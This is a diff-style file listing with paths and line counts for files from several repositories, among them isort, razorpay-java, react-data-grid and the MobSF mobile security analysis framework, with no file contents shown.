- package/GitRepos/isort/isort/wrap_modes.py +323 -0
- package/GitRepos/isort/logo.png +0 -0
- package/GitRepos/isort/mkdocs.yml +2 -0
- package/GitRepos/isort/poetry.lock +2472 -0
- package/GitRepos/isort/pyproject.toml +114 -0
- package/GitRepos/isort/rtd/index.md +6 -0
- package/GitRepos/isort/scripts/build_config_option_docs.py +214 -0
- package/GitRepos/isort/scripts/build_profile_docs.py +42 -0
- package/GitRepos/isort/scripts/check_acknowledgments.py +83 -0
- package/GitRepos/isort/scripts/clean.sh +7 -0
- package/GitRepos/isort/scripts/docker.sh +12 -0
- package/GitRepos/isort/scripts/done.sh +5 -0
- package/GitRepos/isort/scripts/lint.sh +11 -0
- package/GitRepos/isort/scripts/mkstdlibs.py +47 -0
- package/GitRepos/isort/scripts/test.sh +6 -0
- package/GitRepos/isort/scripts/test_integration.sh +4 -0
- package/GitRepos/isort/setup.cfg +28 -0
- package/GitRepos/isort/tests/__init__.py +0 -0
- package/GitRepos/isort/tests/integration/test_hypothesmith.py +96 -0
- package/GitRepos/isort/tests/integration/test_projects_using_isort.py +166 -0
- package/GitRepos/isort/tests/integration/test_setting_combinations.py +1869 -0
- package/GitRepos/isort/tests/unit/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/conftest.py +33 -0
- package/GitRepos/isort/tests/unit/example_crlf_file.py +10 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/almost-implicit/.isort.cfg +2 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/almost-implicit/root/nested/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/almost-implicit/root/nested/x.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/almost-implicit/root/y.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/implicit/.isort.cfg +2 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/implicit/root/nested/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/implicit/root/nested/x.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/none/.isort.cfg +2 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/none/root/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/none/root/nested/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkg_resource/.isort.cfg +2 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkg_resource/root/__init__.py +1 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkg_resource/root/nested/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkg_resource/root/nested/x.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkgutil/.isort.cfg +2 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkgutil/root/__init__.py +1 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkgutil/root/nested/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/example_projects/namespaces/pkgutil/root/nested/x.py +0 -0
- package/GitRepos/isort/tests/unit/profiles/__init__.py +0 -0
- package/GitRepos/isort/tests/unit/profiles/test_attrs.py +102 -0
- package/GitRepos/isort/tests/unit/profiles/test_black.py +370 -0
- package/GitRepos/isort/tests/unit/profiles/test_django.py +122 -0
- package/GitRepos/isort/tests/unit/profiles/test_google.py +413 -0
- package/GitRepos/isort/tests/unit/profiles/test_hug.py +112 -0
- package/GitRepos/isort/tests/unit/profiles/test_open_stack.py +134 -0
- package/GitRepos/isort/tests/unit/profiles/test_plone.py +75 -0
- package/GitRepos/isort/tests/unit/profiles/test_pycharm.py +55 -0
- package/GitRepos/isort/tests/unit/profiles/test_wemake.py +87 -0
- package/GitRepos/isort/tests/unit/test_action_comments.py +47 -0
- package/GitRepos/isort/tests/unit/test_api.py +108 -0
- package/GitRepos/isort/tests/unit/test_comments.py +34 -0
- package/GitRepos/isort/tests/unit/test_deprecated_finders.py +210 -0
- package/GitRepos/isort/tests/unit/test_exceptions.py +100 -0
- package/GitRepos/isort/tests/unit/test_files.py +8 -0
- package/GitRepos/isort/tests/unit/test_format.py +121 -0
- package/GitRepos/isort/tests/unit/test_hooks.py +101 -0
- package/GitRepos/isort/tests/unit/test_identify.py +274 -0
- package/GitRepos/isort/tests/unit/test_importable.py +42 -0
- package/GitRepos/isort/tests/unit/test_io.py +43 -0
- package/GitRepos/isort/tests/unit/test_isort.py +5166 -0
- package/GitRepos/isort/tests/unit/test_literal.py +37 -0
- package/GitRepos/isort/tests/unit/test_main.py +1087 -0
- package/GitRepos/isort/tests/unit/test_output.py +22 -0
- package/GitRepos/isort/tests/unit/test_parse.py +82 -0
- package/GitRepos/isort/tests/unit/test_place.py +56 -0
- package/GitRepos/isort/tests/unit/test_pylama_isort.py +24 -0
- package/GitRepos/isort/tests/unit/test_regressions.py +1653 -0
- package/GitRepos/isort/tests/unit/test_settings.py +229 -0
- package/GitRepos/isort/tests/unit/test_setuptools_command.py +31 -0
- package/GitRepos/isort/tests/unit/test_ticketed_features.py +1117 -0
- package/GitRepos/isort/tests/unit/test_wrap.py +15 -0
- package/GitRepos/isort/tests/unit/test_wrap_modes.py +587 -0
- package/GitRepos/isort/tests/unit/utils.py +14 -0
- package/GitRepos/kettle/LICENSE.txt +21 -0
- package/GitRepos/kettle/README.md +215 -0
- package/GitRepos/kettle/bin/kettle-skeleton.php +316 -0
- package/GitRepos/kettle/composer.json +33 -0
- package/GitRepos/kettle/src/kettle.php +1418 -0
- package/GitRepos/mirrors-autoflake/.pre-commit-hooks.yaml +5 -0
- package/GitRepos/mirrors-autoflake/.version +1 -0
- package/GitRepos/mirrors-autoflake/hooks.yaml +7 -0
- package/GitRepos/mirrors-autoflake/setup.py +8 -0
- package/GitRepos/razorpay-java/LICENSE.txt +8 -0
- package/GitRepos/razorpay-java/README.md +421 -0
- package/GitRepos/razorpay-java/pom.xml +153 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Addon.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/AddonClient.java +17 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/ApiClient.java +194 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/ApiUtils.java +179 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/BankTransfer.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Card.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/CardClient.java +12 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Constants.java +78 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/CustomTLSSocketFactory.java +75 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Customer.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/CustomerClient.java +36 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Entity.java +45 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Invoice.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/InvoiceClient.java +32 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Order.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/OrderClient.java +32 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Payment.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/PaymentClient.java +83 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Plan.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/PlanClient.java +28 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/RazorpayClient.java +45 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/RazorpayException.java +21 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Refund.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/RefundClient.java +28 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Reversal.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Subscription.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/SubscriptionClient.java +36 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Token.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Transfer.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/TransferClient.java +36 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/Utils.java +62 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/VirtualAccount.java +10 -0
- package/GitRepos/razorpay-java/src/main/java/com/razorpay/VirtualAccountClient.java +44 -0
- package/GitRepos/razorpay-java/src/main/resources/project.properties +1 -0
- package/GitRepos/react-data-grid/.babelrc +8 -0
- package/GitRepos/react-data-grid/.github/ISSUE_TEMPLATE.md +25 -0
- package/GitRepos/react-data-grid/.github/PULL_REQUEST_TEMPLATE.md +38 -0
- package/GitRepos/react-data-grid/LICENSE +24 -0
- package/GitRepos/react-data-grid/README.md +82 -0
- package/GitRepos/react-data-grid/addons.js +1 -0
- package/GitRepos/react-data-grid/docs/api/docs.json +6685 -0
- package/GitRepos/react-data-grid/docs/markdowns/AdvancedToolbar.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/AutoCompleteEditor.md +68 -0
- package/GitRepos/react-data-grid/docs/markdowns/AutoCompleteFilter.md +22 -0
- package/GitRepos/react-data-grid/docs/markdowns/AutoCompleteTokensEditor.md +22 -0
- package/GitRepos/react-data-grid/docs/markdowns/Canvas.md +126 -0
- package/GitRepos/react-data-grid/docs/markdowns/Cell.md +101 -0
- package/GitRepos/react-data-grid/docs/markdowns/CheckboxEditor.md +27 -0
- package/GitRepos/react-data-grid/docs/markdowns/ContextMenu.md +12 -0
- package/GitRepos/react-data-grid/docs/markdowns/DateRangeEditor.md +24 -0
- package/GitRepos/react-data-grid/docs/markdowns/DateRangeFilter.md +42 -0
- package/GitRepos/react-data-grid/docs/markdowns/DateRangeFormatter.md +25 -0
- package/GitRepos/react-data-grid/docs/markdowns/DragDropContainer.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/Draggable.md +30 -0
- package/GitRepos/react-data-grid/docs/markdowns/DraggableHeaderCell.md +22 -0
- package/GitRepos/react-data-grid/docs/markdowns/DropDownEditor.md +12 -0
- package/GitRepos/react-data-grid/docs/markdowns/DropDownFormatter.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/EditorBase.md +32 -0
- package/GitRepos/react-data-grid/docs/markdowns/EditorContainer.md +37 -0
- package/GitRepos/react-data-grid/docs/markdowns/FilterableHeaderCell.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/Grid.md +169 -0
- package/GitRepos/react-data-grid/docs/markdowns/GroupedColumnButton.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/GroupedColumnsPanel.md +44 -0
- package/GitRepos/react-data-grid/docs/markdowns/Header.md +62 -0
- package/GitRepos/react-data-grid/docs/markdowns/HeaderCell.md +40 -0
- package/GitRepos/react-data-grid/docs/markdowns/HeaderRow.md +92 -0
- package/GitRepos/react-data-grid/docs/markdowns/ImageFormatter.md +12 -0
- package/GitRepos/react-data-grid/docs/markdowns/MenuHeader.md +12 -0
- package/GitRepos/react-data-grid/docs/markdowns/NumericFilter.md +17 -0
- package/GitRepos/react-data-grid/docs/markdowns/ReactDataGrid.md +209 -0
- package/GitRepos/react-data-grid/docs/markdowns/Row.md +70 -0
- package/GitRepos/react-data-grid/docs/markdowns/RowActionsCell.md +53 -0
- package/GitRepos/react-data-grid/docs/markdowns/RowDragLayer.md +42 -0
- package/GitRepos/react-data-grid/docs/markdowns/RowGroup.md +57 -0
- package/GitRepos/react-data-grid/docs/markdowns/SimpleCellFormatter.md +12 -0
- package/GitRepos/react-data-grid/docs/markdowns/SortableHeaderCell.md +27 -0
- package/GitRepos/react-data-grid/docs/markdowns/Toolbar.md +44 -0
- package/GitRepos/react-data-grid/docs/markdowns/Viewport.md +102 -0
- package/GitRepos/react-data-grid/docs/readme.md +38 -0
- package/GitRepos/react-data-grid/docs/utils/generalUtils.js +50 -0
- package/GitRepos/react-data-grid/docs/utils/generateMarkdown.js +74 -0
- package/GitRepos/react-data-grid/index.js +1 -0
- package/GitRepos/react-data-grid/package.json +120 -0
- package/GitRepos/react-data-grid/themes/DragColumn.PNG +0 -0
- package/GitRepos/react-data-grid/themes/daterangepicker-bs3.css +284 -0
- package/GitRepos/react-data-grid/themes/drag_column_full.PNG +0 -0
- package/GitRepos/react-data-grid/themes/react-data-grid.css +961 -0
- package/GitRepos/react-data-grid/themes/react-data-grid.less +629 -0
- package/Kali +0 -0
- package/MobSF/.dockerignore +26 -0
- package/MobSF/.github/CODE_OF_CONDUCT.md +46 -0
- package/MobSF/.github/CONTRIBUTING.md +131 -0
- package/MobSF/.github/FUNDING.yml +3 -0
- package/MobSF/.github/ISSUE_TEMPLATE/bug_report.md +54 -0
- package/MobSF/.github/ISSUE_TEMPLATE/feature_request.md +22 -0
- package/MobSF/.github/PULL_REQUEST_TEMPLATE.md +20 -0
- package/MobSF/.github/SECURITY.md +21 -0
- package/MobSF/.github/SUPPORT.md +1 -0
- package/MobSF/.github/workflows/auto-comment.yml +22 -0
- package/MobSF/.github/workflows/docker-build.yml +35 -0
- package/MobSF/.github/workflows/mobsf_test.yml +58 -0
- package/MobSF/.github/workflows/python-publish.yml +28 -0
- package/MobSF/.gitmodules +3 -0
- package/MobSF/.pyup.yml +27 -0
- package/MobSF/.sonarcloud.properties +3 -0
- package/MobSF/Dockerfile +96 -0
- package/MobSF/LICENSE +675 -0
- package/MobSF/LICENSES/AdminLTE_theme.txt +8 -0
- package/MobSF/LICENSES/AntiEmulator.txt +660 -0
- package/MobSF/LICENSES/IP2LOCATION LITE DATA.txt +21 -0
- package/MobSF/LICENSES/Rootcloak.txt +13 -0
- package/MobSF/LICENSES/ac-pm_tools.txt +341 -0
- package/MobSF/LICENSES/androguard.txt +76 -0
- package/MobSF/LICENSES/backsmali.txt +29 -0
- package/MobSF/LICENSES/class-dump-z.txt +13 -0
- package/MobSF/LICENSES/droidmon.txt +624 -0
- package/MobSF/LICENSES/exodus-core.txt +661 -0
- package/MobSF/LICENSES/frida.txt +50 -0
- package/MobSF/LICENSES/ios_binary_analysis_rules.txt +28 -0
- package/MobSF/LICENSES/jadx.txt +202 -0
- package/MobSF/LICENSES/maltrail_blacklist.txt +21 -0
- package/MobSF/MANIFEST.in +12 -0
- package/MobSF/README.md +116 -0
- package/MobSF/docker-compose.yml +39 -0
- package/MobSF/manage.py +18 -0
- package/MobSF/mobsf/DynamicAnalyzer/__init__.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/admin.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/models.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tests.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/__init__.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/class_trace.js +126 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/get_loaded_classes.js +15 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/get_methods.js +22 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/search_class_pattern.js +55 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/string_catch.js +10 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary/string_compare.js +15 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/api_monitor.js +572 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/debugger_check_bypass.js +8 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/root_bypass.js +260 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/ssl_pinning_bypass.js +255 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/aes_key.js +161 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/bypass_flag_secure.js +17 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/bypass_method.js +8 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/default.js +3 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/file_trace.js +455 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/get_android_id.js +9 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/helper.js +16 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/hook_constructor.js +7 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/hook_java_reflection.js +7 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/inputstream_dump.js +34 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/intent_dumper.js +21 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/jni_hook_by_address.js +28 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/jni_trace.js +42 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others/webview_enable_debugging.js +12 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/mobsf_agents/ClipDump.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/Xposed.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/XposedInstaller_3.1.5.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/hooks.json +389 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/AndroidBluePill.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/Droidmon.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/JustTrustMe.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/com.devadvance.rootcloak2_v18_c43b61.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/hooks.json +389 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/mobi.acpm.proxyon_v1_419b04.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/onDevice/xposed/modules/mobi.acpm.sslunpinning_v2_37f44f.apk +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/tools/webproxy.py +89 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/__init__.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/__init__.py +0 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/analysis.py +285 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/dynamic_analyzer.py +316 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/environment.py +698 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/frida_core.py +168 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/frida_scripts.py +65 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/frida_server_download.py +75 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/operations.py +299 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/report.py +179 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/tests_common.py +212 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/tests_frida.py +339 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/tests_tls.py +109 -0
- package/MobSF/mobsf/DynamicAnalyzer/views/android/tests_xposed.py +194 -0
- package/MobSF/mobsf/MalwareAnalyzer/__init__.py +0 -0
- package/MobSF/mobsf/MalwareAnalyzer/admin.py +0 -0
- package/MobSF/mobsf/MalwareAnalyzer/models.py +0 -0
- package/MobSF/mobsf/MalwareAnalyzer/tests.py +0 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/MalwareDomainCheck.py +226 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/Trackers.py +237 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/VirusTotal.py +140 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/__init__.py +0 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/apkid.py +61 -0
- package/MobSF/mobsf/MalwareAnalyzer/views/quark.py +145 -0
- package/MobSF/mobsf/MobSF/__init__.py +0 -0
- package/MobSF/mobsf/MobSF/forms.py +36 -0
- package/MobSF/mobsf/MobSF/init.py +143 -0
- package/MobSF/mobsf/MobSF/models.py +0 -0
- package/MobSF/mobsf/MobSF/settings.py +411 -0
- package/MobSF/mobsf/MobSF/urls.py +145 -0
- package/MobSF/mobsf/MobSF/utils.py +598 -0
- package/MobSF/mobsf/MobSF/views/__init__.py +0 -0
- package/MobSF/mobsf/MobSF/views/api/__init__.py +0 -0
- package/MobSF/mobsf/MobSF/views/api/api_dynamic_analysis.py +278 -0
- package/MobSF/mobsf/MobSF/views/api/api_middleware.py +47 -0
- package/MobSF/mobsf/MobSF/views/api/api_static_analysis.py +186 -0
- package/MobSF/mobsf/MobSF/views/apk_downloader.py +163 -0
- package/MobSF/mobsf/MobSF/views/helpers.py +94 -0
- package/MobSF/mobsf/MobSF/views/home.py +350 -0
- package/MobSF/mobsf/MobSF/views/scanning.py +149 -0
- package/MobSF/mobsf/MobSF/wsgi.py +24 -0
- package/MobSF/mobsf/StaticAnalyzer/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/admin.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/forms.py +92 -0
- package/MobSF/mobsf/StaticAnalyzer/models.py +123 -0
- package/MobSF/mobsf/StaticAnalyzer/tests.py +425 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/apktool_2.5.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/baksmali-2.5.2.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/ios/class-dump +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/ios/class-dump-swift +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/ios/jtool.ELF64 +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/LICENSE +201 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/NOTICE +213 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/README.md +125 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx +185 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx-gui +185 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx-gui.bat +89 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx.bat +89 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/android-29-clst.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/android-29-res.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/antlr-2.7.7.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/antlr-runtime-3.5.2.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/apksig-4.0.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/asm-8.0.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/baksmali-2.4.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/checker-qual-2.11.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/commons-lang3-3.11.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/commons-text-1.9.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/dexlib2-2.4.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/dx-1.16.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/error_prone_annotations-2.3.4.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/failureaccess-1.0.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/gson-2.8.6.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/guava-29.0-jre.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/image-viewer-1.2.3.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/j2objc-annotations-1.3.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-cli-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-core-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-dex-input-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-gui-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-java-convert-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-plugins-api-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jadx-smali-input-1.2.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jcommander-1.80.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jfontchooser-1.0.5.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/jsr305-3.0.2.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/logback-classic-1.2.3.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/logback-core-1.2.3.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/reactive-streams-1.0.3.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/rsyntaxtextarea-3.1.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/rxjava-2.2.19.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/rxjava2-swing-0.3.7.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/slf4j-api-1.7.30.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/smali-2.4.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/stringtemplate-3.2.1.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/jadx/lib/util-2.4.0.jar +0 -0
- package/MobSF/mobsf/StaticAnalyzer/tools/strings.py +24 -0
- package/MobSF/mobsf/StaticAnalyzer/views/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/android_manifest_desc.py +747 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/binary_analysis.py +255 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/cert_analysis.py +160 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/code_analysis.py +96 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/converter.py +97 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/db_interaction.py +217 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/dvm_permissions.py +278 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/find.py +75 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/generate_downloads.py +53 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/icon_analysis.py +134 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/manifest_analysis.py +908 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/manifest_view.py +64 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/network_security.py +243 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/playstore.py +76 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/rules/android_apis.yaml +425 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/rules/android_niap.yaml +356 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/rules/android_rules.yaml +683 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/source_tree.py +79 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/static_analyzer.py +660 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/strings.py +64 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/view_source.py +78 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/win_fixes.py +53 -0
- package/MobSF/mobsf/StaticAnalyzer/views/android/xapk.py +57 -0
- package/MobSF/mobsf/StaticAnalyzer/views/comparer.py +234 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/app_transport_security.py +222 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/appstore.py +54 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/binary_analysis.py +119 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/binary_rule_matcher.py +58 -0
